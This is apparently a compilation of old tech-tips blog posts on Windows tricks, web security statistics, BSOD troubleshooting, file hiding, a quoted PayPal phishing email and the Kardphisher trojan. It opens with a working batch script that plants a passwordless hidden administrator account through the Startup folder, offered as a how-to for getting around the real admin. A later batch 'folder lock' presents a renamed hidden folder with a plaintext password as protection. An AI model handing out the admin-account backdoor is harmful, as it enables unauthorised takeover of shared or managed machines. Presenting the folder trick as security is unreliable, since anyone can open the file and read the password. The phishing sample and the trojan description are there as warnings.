Now here is how you do it.

Step 1: Open up Notepad, copy and paste the following code into it and save the file as admin.bat. (You could actually give it any name, just make sure that the extension is .bat)

@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

Step 2: Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

Step 3: There is no step 3.

The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.

Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.

The second annual McAfee “Mapping the Mal Web” report into the riskiest and safest places on the Web reveals that 19.2% of all Web sites ending in the “.hk” domain pose a security threat to Web users. China (.cn) is second this year with over 11%. By contrast, Finland (.fi) remains the safest online destination for the second year with 0.05%, followed by Japan (.jp).

The most risky generic domain from 2007’s report became more dangerous with 11.8% of all sites ending in .info posing a security threat and is the third most dangerous domain overall while government websites (.gov) remained the safest generic domain. The most popular domain, .com, is the ninth riskiest overall.

The study compared the ratings of sites found in each of the 265 country and generic domains and ranked them by the number of risky Web sites found in each domain that contained adware, spyware, viruses, spam, excessive pop-ups, browser exploits or links to other red-rated sites.

Other key findings from McAfee “Mapping the Mal Web Revisited” report 2008 include:

• The chance of downloading spyware, adware, viruses or other unwanted software from surfing the Web increased 41.5% over 2007
• Sites which offer downloads such as ringtones and screen savers that are also loaded with viruses, spyware and adware increased over the last year from 3.3% to 4.7%
• The Philippines (.ph) experienced a 270% increase in overall riskiness
• Tokelau (.tk) and Samoa (.ws) were notably safer in 2008 dropping to 28th and 12th
• In Europe, Spain (.es) experienced a 91% increase in overall risk.

The conditions that cause a blue screen have changed since the days of Windows 95/98, as has what it means. In either case, chances are pretty good that, if you get blue-screened, any unsaved work will be lost, as either Windows (in NT/2000/XP) or your application (in 95/98) has been shut down. The BSOD is perhaps the most despised error not only because it has wiped away countless hours of work over the years, but because of the obtuse way in which it does so. The messages delivered in the typical blue screen are meant for developers more than end users. For example, a blue screen delivered by Windows may deliver a message such as the following:

“0×0000001E, KMODE_EXCEPTION_NOT_HANDLED.”

And if you don’t find that sufficiently informative, you’ll see four variables in parentheses to help developers figure out what’s happening. Again, none of this will mean much to most of us, but a support rep or developer can often learn a great deal from such cryptic messages.

Fortunately, blue screens are rare in recent versions of Windows and may disappear after a reboot. But if the problem recurs, you could have a real problem. Here are some troubleshooting steps to follow if you encounter a BSOD:

While your system is booting, press F8 and select Safe Boot Mode, which loads a subset of Windows with minimal drivers. If things run smoothly in Safe Mode, you likely have a software problem with a recently installed application. Try to decipher the error message to see if you can trace it to a specific program. If all else fails, uninstall your most recently-installed application.

If you still see blue screen errors in Safe Mode, restart again and use F8 to get to the advanced options. This time, choose Restore Last Known Good Configuration, which is a snapshot of your system as it existed before you last installed any drivers or other software. You will lose any system changes you’ve made since that point, but your documents will normally remain untouched by this process.

If you’re still having problems, you are likely suffering from a hardware problem or a corruption of vital system files. Again, any hints that you can glean from the error message could help you (or a tech support rep) trace the source of the problem. Remove any recently installed hardware and try booting again.

In the worst case, it’s not uncommon to have to resort to reinstalling device drivers or even the whole operating system.

Ultimately, the best cure for the BSOD is prevention: Save often, create frequent backups, and burn a little incense to curry favor with capricious PC spirits.

Perhaps you have saved some of this information on your computer where it is conveniently at your reach, but when the time comes to remove the data from your hard disk, things get a bit more complicated and maintaining your privacy is not as simple as it may have seemed at first.

Your first thought may be that when you ‘delete’ the file, the data is gone. Not quite, when you delete a file, the operating system does not really remove the file from the disk; it only removes the reference of the file from the file system table. The file remains on the disk until another file is created over it, and even after that, it might be possible to recover data by studying the magnetic fields on the disk platter surface. Before the file is overwritten, anyone can easily retrieve it with a disk maintenance or an undelete utility.

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. It is kind of like a digital equivalent of your office shredder. Eraser is Free software and its source code is released under GNU General Public License.

To erase, just right click on the file or folder you want to erase and click on the ‘erase’ option on the menu. The same applies for erasing the contents of your recycle bin. You can ever erase unused disk space, that is disk space from which files have only previously been deleted. To do that, just right click on the drive and choose ‘Erase Unused Space’.

Hopefully, Eraser can also erase your worries about someone spying into your deleted files.

Download Eraser

But then again, though you might be the only person who uses your home computer all the time or at least most of the time, there may be times when someone else happens to use it too. Like for instance, one of your friends or your guest might want to browse the web for a while. Your immediate thoughts are, what if they want to view one of the sites for which you have saved your password. Your browser would automatically log them in with your username and password. Worse still, anybody can just go to Tools>Options>Security and click on ‘Show Passwords’ and all your usernames and passwords are theirs for the taking. You just don’t want that to happen, do you?

Well, if you use Firefox, then you have a neat little solution built into it. Firefox has a feature called the ‘Master Password’ that’s just right for situations like the above. But not many people are aware of it or use it.

If you go to Tools>Options>Security, you would find that right below the ‘Remember passwords for sites’ checkbox which is enabled by default, there is another checkbox called ‘Use a master password‘ which, by default, is not enabled. If you enable this option, you will be prompted to set a master password. You can set a unique password here. Once you set the master password, whenever you visit a page (since you last launched Firefox) for which you’ve asked Firefox to remember the password, you’ll have to enter your master password first before Firefox fills up the password automatically. And without the master password, no one can use the ‘Show Passwords’ button to view the stored passwords. So, you can safely let your guest use your computer.

Now, here we will see how to create a folder that will not just be invisible, but also require a password to reveal it and open it. The best part is that you don’t need any special software to do this. Just plain old Notepad is all that you need.

Here is the code that you need:

cls
@ECHO OFF
title Folder Personal
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Personal goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Personal “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK

echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==pwd123 HERE goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Personal
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Personal
echo Personal created successfully
goto End
:End

Now here is what you need to do:

Just copy the above code and paste it into Notepad. Save it by giving it any name you choose. Assuming, the file is called secret.txt, change the extension to ‘.bat‘ so that the new name becomes secret.bat. What you get is a batch file. You could actually save one step by saving the file in Notepad directly as secret.bat by enclosing the file name like this: “secret.bat” . This batch file is the one that you need. You can edit this batch file to change the folder name and the password. To change the name of the folder that is created, change the ‘Personal’ (in bold in the above code) to any another name you choose. Likewise change the ‘pwd123′ (in red in the code) to anything else.

Now let’s see how to use it. Place the file in the location where you would like to create your protected folder. Run the batch file by double clicking on it. This will create a folder named Personal in the same location as the batch file. You can now open this folder and place any files in it. Once you are finished, run the batch file again. You will be asked whether you want to lock the folder. Entry ‘Y’ (for Yes) and hit Enter. The folder becomes invisible. To retrieve the folder, run the batch file again. You will be prompted to enter the password. Enter the password, hit enter and voila! the folder appears.

Important: The batch file acts like a key to open the locked folder. So once you have created and locked a folder, do not keep the batch file in the same location since anybody can open the batch file and view your password. So I would suggest that you keep the batch file in a separate and safe place or better still keep it on your pen drive or flash drive. That way when you want to open the folder just copy the batch file to the location where you have your protected folder and run it.

Do remember that the above method is not intended to act as a substitute for the numerous free and commercial softwares that are specifically designed to provide security and encryption to your data.

Update: I got comments saying the code does not work. Of course I did check it before posting it here. But I have identified the problem. The problem is with the straight double quotes used in the code in this post. Once you copy the code you would also need to change each of the double quotes with your keyboard double quotes. That might seem a lot of work for some. So I thought it would be easier to give away the batch file itself. You can download the file here. (Use right-click and ‘Save Target as’ or ‘Save Link as’).

Steganography is the art and science of writing hidden messages in such a way that no one apart from the sender and intended recipient even realizes there is a hidden message.

There are lots of methods and tools to hide messages and files. But there is a very simple method by which you can hide an mp3 format audio file inside of an image file and best of all you don’t need any special software for this. You can do it by using just plain old dos command.
Here is how you do it. Let’s suppose we are going to hide an mp3 file inside a gif file. Make sure that you have both the gif file and the mp3 file in the same folder. Open a command prompt window and navigate to the folder. If the files are named image.gif and music.mp3, then this is the command that you need to use:

“copy image.gif /b + music.mp3 /b combined.gif”

Once you run the command you will find a new file named combined.gif. Of course, you could use any name for the target file. Just make sure it has a gif extension (jpg if you are using a jpg image file).
Now if you open the file it will show up as an image file and the image will be displayed. There will be no indication of the mp3 file at all.

To listen to the mp3 file, you would need to open it manually in Winamp player. I have tried using VLC player and Windows Media Player: while there is no error displayed, the audio doen’t play. With Winamp the audio plays fine.

The above method works equally well with jpg files. I haven’t tried using bmp file. It might work. But using a wav file instead of an mp3 file does not seem to work.

So now you can claim to be a Steganographer. Keep in mind that if you hide a large audio file inside a small image file, then the disproportionately large size of the resulting gif/jpg file may raise eyebrows.

Dear PayPal Customer,

We are contacting you to remind you that on December 6, 2007 our Account Review Team identified some unusual activity in your account.

In accordance with PayPal’s User Agreement and Privacy Policy, and to ensure that your account has not been compromised yet, access to your account was limited. Your account access will remains limited until this issue has been resolved.

To secure your account and quickly restore full access on your account, we encourage you to log in and perform the steps necessary to restore your account access as soon as possible by clicking the link below:

Please click here to restore your account access

Failure to verify and/or update your personal records, or if you choose to ignore our request, may result in further limitations or eventual account closure.

Thank you for your prompt attention to this matter. Please understand that this case intended to help protecting you and your account.

We apologize for any inconvenience.

Sincerely,
PayPal, Inc.
P.O. Box 45950
Omaha, NE 68145

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the Help link in the header of any page.

To modify your notification preferences, log in to your PayPal account, click the Profile sub-tab, then click the Notifications link under Account Information. Changes may take up to 10 days to be reflected in our mailings. PayPal will not sell or rent any of your personally identifiable information to third parties. For more information about the security of your information, read our Privacy Policy at https://www.paypal.com/privacy.

Copyright © 2007 PayPal Inc. All rights reserved. Designated trademarks and brands are the property of their respective owners. PayPal is located at 2211 N. First St., San Jose, CA 95131.

Just try clicking on the link Please click here to restore your account access. If you are using Firefox then you would immediately be notified that this is a Suspected Web Forgery. But Firefox will issue this warning only after the page has been reported as forgery and that might be a few hours or days after many of the gullible people fall prey to the spoof.

So the next time you get such mails from financial sites like paypal or your bank, make sure that the mail is genuine even before clicking on any link in the mail.

You may want to read my earlier post on How to spot a phishing email.

Here is what Kardphisher does if your system gets infected.

The first time you reboot after getting infected, Kardphisher asks you to reactivate your copy of Windows, citing piracy issues and telling you that another user has activated your copy. It then asks for your credit card information assuring you that you will not be charged.

If you don’t enter the credit card information, Kardphisher shuts down the PC. Worse still, the trojan also disables the Windows Task Manager, which makes it more difficult to shut the malware down.

Since it runs on the first reboot, the message looks quite legitimate. Normally people expect malwares to run when clicking upon a new file. Surprisingly, the program even runs on versions of Windows that do not require activation. While a shrewd user might notice it and get suspicious, most users may not be quick enough to realise that their version of Windows would not ask for activation.

However, you need not be overtly worried about this Trojan. Symantec’s threat assessment of Kardphisher is quite encouraging and there is nothing much to worry about. If you do get infected with Kardphisher you may want to check out the Removal instruction given at Symantec.com.

Scientists at Hitachi Research Labs in Japan have devised the smallest RFID tag ever, just 0.05 millimeter by 0.05 millimeter, tinier than a grain of sand.

The so-called powder chip is thin enough that it can be mixed with paper pulp to add a layer of counterfeit protection to gift certificates, passports and currency.

It’s also caught the interest of the jewelry industry, which could invisibly embed the chip in rings and necklaces to track their origins, making them more diffi cult to sell illegally. Each chip stores a unique 38-digit ID number. When stimulated by an RFID reader, the chip emits its code, verifying its identity. The code is integrated into the chip’s circuitry, making counterfeiting impossible.

Source: Popular Science Magazine